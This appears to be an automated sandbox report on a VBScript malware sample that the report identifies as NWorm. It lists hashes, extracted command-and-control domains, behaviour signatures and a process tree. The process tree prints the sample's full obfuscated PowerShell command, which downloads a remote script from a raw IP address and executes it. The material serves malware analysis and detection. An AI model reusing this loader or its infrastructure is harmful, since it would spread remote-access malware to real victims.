Analysis
-
max time kernel
138s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
11-02-2022 18:09
Static task
static1
Behavioral task
behavioral1
Sample
CQNUQGCNZ.vbs
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
CQNUQGCNZ.vbs
Resource
win10v2004-en-20220113
General
-
Target
CQNUQGCNZ.vbs
-
Size
10KB
-
MD5
6612508aa88431555344552cb01f160e
-
SHA1
27996b57e0e6f57c28c99f6f6689683d4baca2d5
-
SHA256
cccccb888c81985ab515e56c035ae0e5708b88d8a8ef3b08a1a9d990fbbe83cd
-
SHA512
90c375626a3aeaf61b9aa77f1019c29e0215bbeb1e22f1cb22f8c4d55733177c0af674999e3829e9b838ee5b2b589259b479bfcf2855f6089afd8ae796a5f12c
Malware Config
Extracted
nworm
v0.3.8
nyanmoj.duckdns.org:5057
moneyhope81.duckdns.org:5057
cb2d3cba
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 4128 powershell.exe 32 4128 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4128 set thread context of 1288 4128 powershell.exe csc.exe -
Drops file in Windows directory 8 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4128 powershell.exe 4128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exesvchost.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 4128 powershell.exe Token: SeShutdownPrivilege 396 svchost.exe Token: SeCreatePagefilePrivilege 396 svchost.exe Token: SeShutdownPrivilege 396 svchost.exe Token: SeCreatePagefilePrivilege 396 svchost.exe Token: SeShutdownPrivilege 396 svchost.exe Token: SeCreatePagefilePrivilege 396 svchost.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe Token: SeBackupPrivilege 1072 TiWorker.exe Token: SeRestorePrivilege 1072 TiWorker.exe Token: SeSecurityPrivilege 1072 TiWorker.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 4852 wrote to memory of 4128 4852 WScript.exe powershell.exe PID 4852 wrote to memory of 4128 4852 WScript.exe powershell.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe PID 4128 wrote to memory of 1288 4128 powershell.exe csc.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CQNUQGCNZ.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HUEFUTBTCTLCFKDGFALECUN = '[*+5&/!3<</(%3<$$&<1@#-y*+5&/!3<</(%3<$$&<1@#-t/%&1&+&7=!@8-0(0-+8%$\[/&]9}][1_+@%-&<&#^--%.IO.*+5&/!3<</(%3<$$&<1@#-t)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%[/&]9}][1_+@%-&<&#^--%)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%d/%&1&+&7=!@8-0(0-+8%$\)*({3!_=3]@{-+1\}@%{88]'.RePlace('*+5&/!3<</(%3<$$&<1@#-','S').RePlace('/%&1&+&7=!@8-0(0-+8%$\','E').RePlace(')*({3!_=3]@{-+1\}@%{88','R').RePlace('4}84}8705\01[/#-(6&19%','A').RePlace('[/&]9}][1_+@%-&<&#^--%','M');$HHPCXNLYCJNJNANYSIXGBXB = ($HUEFUTBTCTLCFKDGFALECUN -Join '')|&('I'+'EX');$HBSWWCHKJPHCIHYLPBADIVC = '[%=}3&3{997<)<9(\/#$9]_y%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%!^%)7)_4&^+#%{370{3-#%m.N!^%)7)_4&^+#%{370{3-#%#[{9@(%3!%*}#!(]]5)5+%.W!^%)7)_4&^+#%{370{3-#%bR!^%)7)_4&^+#%{370{3-#%qu!^%)7)_4&^+#%{370{3-#%%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%]'.RePlace('%=}3&3{997<)<9(\/#$9]_','S').RePlace('!^%)7)_4&^+#%{370{3-#%','E').RePlace('#[{9@(%3!%*}#!(]]5)5+%','T');$HRKBGLQEIIOTGKRAVGDLNFB = ($HBSWWCHKJPHCIHYLPBADIVC -Join '')|&('I'+'EX');$HEKLNIBCXUJQWGFRURKPEYH = '}=5(@3]#3)+286%^()-%7%r\9-9[^\2<62^/3@+]3!){}a^[0__=$7}#(@{][37@^2_&\9-9[^\2<62^/3@+]3!){}'.RePlace('}=5(@3]#3)+286%^()-%7%','C').RePlace('\9-9[^\2<62^/3@+]3!){}','E').RePlace('^[0__=$7}#(@{][37@^2_&','T');$HEBZUFQTNVBUTPKTLSTLJWS = '<=7#5]=_4*+3-]/7}6)-!)\(9%[{[/5=6/[(%9(&%592tR\(9%[{[/5=6/[(%9(&%592++4/41*0$\7@})4_2\{5$/Pon++4/41*0$\7@})4_2\{5$/\(9%[{[/5=6/[(%9(&%592'.RePlace('<=7#5]=_4*+3-]/7}6)-!)','G').RePlace('\(9%[{[/5=6/[(%9(&%592','E').RePlace('++4/41*0$\7@})4_2\{5$/','S');$HHPHRZIHNFHAGPKYQIXDUFE = 'G-^{}6\%&!4)-{0/-92=!)1t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08Pon\{1@=&(406!]](!]+[#[08-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1am'.RePlace('\{1@=&(406!]](!]+[#[08','S').RePlace('-^{}6\%&!4)-{0/-92=!)1','E').RePlace('1/=&068/-*)_2^(\@_)-}7','R');$HXLYDESAYDAKLLLAJUVKBOS = '85{2//*@5<)-^[3_)00#@2449$6@_2+[6{+*=970##$_a101-}+2!%$[72+-&{7+39{To449$6@_2+[6{+*=970##$_n101-}+2!%$[72+-&{7+39{'.RePlace('85{2//*@5<)-^[3_)00#@2','R').RePlace('449$6@_2+[6{+*=970##$_','E').RePlace('101-}+2!%$[72+-&{7+39{','D');&('I'+'EX')($HHPCXNLYCJNJNANYSIXGBXB::new($HRKBGLQEIIOTGKRAVGDLNFB::$HEKLNIBCXUJQWGFRURKPEYH('HttP://54.235.58.2/4/Ps1Hff.txt').$HEBZUFQTNVBUTPKTLSTLJWS().$HHPHRZIHNFHAGPKYQIXDUFE()).$HXLYDESAYDAKLLLAJUVKBOS())2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/396-135-0x000001DD19980000-0x000001DD19990000-memory.dmpFilesize
64KB
-
memory/396-137-0x000001DD1CD60000-0x000001DD1CD64000-memory.dmpFilesize
16KB
-
memory/396-136-0x000001DD1A160000-0x000001DD1A170000-memory.dmpFilesize
64KB
-
memory/1288-139-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/1288-140-0x0000000074ECE000-0x0000000074ECF000-memory.dmpFilesize
4KB
-
memory/1288-141-0x0000000002FD0000-0x0000000002FD1000-memory.dmpFilesize
4KB
-
memory/1288-142-0x00000000030D0000-0x000000000316C000-memory.dmpFilesize
624KB
-
memory/1288-143-0x0000000006110000-0x00000000066B4000-memory.dmpFilesize
5.6MB
-
memory/1288-144-0x0000000003170000-0x00000000031D6000-memory.dmpFilesize
408KB
-
memory/4128-134-0x00000248FEE46000-0x00000248FEE48000-memory.dmpFilesize
8KB
-
memory/4128-133-0x00000248FEE43000-0x00000248FEE45000-memory.dmpFilesize
8KB
-
memory/4128-131-0x00007FFB2BB13000-0x00007FFB2BB15000-memory.dmpFilesize
8KB
-
memory/4128-132-0x00000248FEE40000-0x00000248FEE42000-memory.dmpFilesize
8KB
-
memory/4128-138-0x00000248FFDB0000-0x00000248FFDCA000-memory.dmpFilesize
104KB
-
memory/4128-130-0x00000248FEF50000-0x00000248FEF72000-memory.dmpFilesize
136KB